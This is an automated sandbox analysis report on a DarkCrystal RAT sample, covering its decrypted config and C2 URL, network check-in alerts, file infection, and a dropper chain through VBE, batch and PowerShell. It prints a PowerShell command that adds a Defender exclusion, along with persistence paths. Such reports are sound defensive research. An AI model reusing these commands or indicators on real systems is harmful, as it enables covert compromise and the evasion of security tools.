                                    Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-l6SyUDRxjaImQy2wOPXg","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                                    Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://733812cm.n9shteam.in/","DefaultWordpress"]]
                                    Source: DCobxod.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: DCobxod.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCobxod.exe
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0041A69B
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0042C220
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043B348 FindFirstFileExA,0_2_0043B348
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49977 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49975 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49985 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49983 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49979 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49978 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49883 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49976 -> 104.21.16.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49984 -> 104.21.16.1:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3658740725.0000021210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00416FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00416FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041848E0_2_0041848E
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004140FE0_2_004140FE
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004240880_2_00424088
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004200B70_2_004200B7
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004271530_2_00427153
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004351C90_2_004351C9
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004262CA0_2_004262CA
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004132F70_2_004132F7
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004243BF0_2_004243BF
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043D4400_2_0043D440
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041F4610_2_0041F461
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041C4260_2_0041C426
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004277EF0_2_004277EF
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041286B0_2_0041286B
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043D8EE0_2_0043D8EE
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_004419F40_2_004419F4
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041E9B70_2_0041E9B7
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00426CDC0_2_00426CDC
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00423E0B0_2_00423E0B
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041EFE20_2_0041EFE2
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00434F9A0_2_00434F9A
                                    Source: C:\Browserhost\intoHostperf.exeCode function: 5_2_00007FF848D90D475_2_00007FF848D90D47
                                    Source: C:\Browserhost\intoHostperf.exeCode function: 5_2_00007FF848D90E435_2_00007FF848D90E43
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: String function: 0042F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: String function: 0042EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: String function: 0042EB78 appears 39 times
                                    Source: TkyvVenI.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: CdhQCsIu.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: bnxVycYy.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: QuHEOinP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: zmrZuvIB.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: pEXJLSDT.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: XrvErxiE.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: DaJYXsXp.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: urpInPSH.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: kIWsDnNZ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: NzFoXiJZ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: GTYGJoJn.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: xpPRZvtG.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: nBlbpjyY.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: WuUwVxTJ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: TBFNkAhL.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: AkShQvXv.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: jcBCwIrh.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ZuimMgmz.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: QQZxdmXS.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: HhGhtKRk.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: wtcqJyWC.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: DCobxod.exe, 00000000.00000003.2057370012.000000000322C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DCobxod.exe
                                    Source: DCobxod.exe, 00000000.00000003.2057370012.000000000322C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs DCobxod.exe
                                    Source: DCobxod.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs DCobxod.exe
                                    Source: DCobxod.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@56/79@0/0
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00416C74 GetLastError,FormatMessageW,0_2_00416C74
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0042A6C2
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMPJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\NzFoXiJZ.logJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
                                    Source: C:\Browserhost\intoHostperf.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-l6SyUDRxjaImQy2wOPXg
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3304:120:WilError_03
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\AppData\Local\Temp\y4s1cmk0Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
                                    Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                    Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                    Source: C:\Users\user\Desktop\DCobxod.exeCommand line argument: sfxname0_2_0042DF1E
                                    Source: C:\Users\user\Desktop\DCobxod.exeCommand line argument: sfxstime0_2_0042DF1E
                                    Source: C:\Users\user\Desktop\DCobxod.exeCommand line argument: STARTDLG0_2_0042DF1E
                                    Source: C:\Users\user\Desktop\DCobxod.exeCommand line argument: xzF0_2_0042DF1E
                                    Source: DCobxod.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: DCobxod.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\DCobxod.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: DCobxod.exeVirustotal: Detection: 55%
                                    Source: DCobxod.exeReversingLabs: Detection: 47%
                                    Source: C:\Users\user\Desktop\DCobxod.exeFile read: C:\Users\user\Desktop\DCobxod.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\DCobxod.exe "C:\Users\user\Desktop\DCobxod.exe"
                                    Source: C:\Users\user\Desktop\DCobxod.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
                                    Source: unknownProcess created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                    Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe C:\Users\Default\NetHood\explorer.exe
                                    Source: unknownProcess created: C:\Browserhost\LaSqLWtOcizKrlm.exe C:\Browserhost\LaSqLWtOcizKrlm.exe
                                    Source: unknownProcess created: C:\Browserhost\LaSqLWtOcizKrlm.exe C:\Browserhost\LaSqLWtOcizKrlm.exe
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
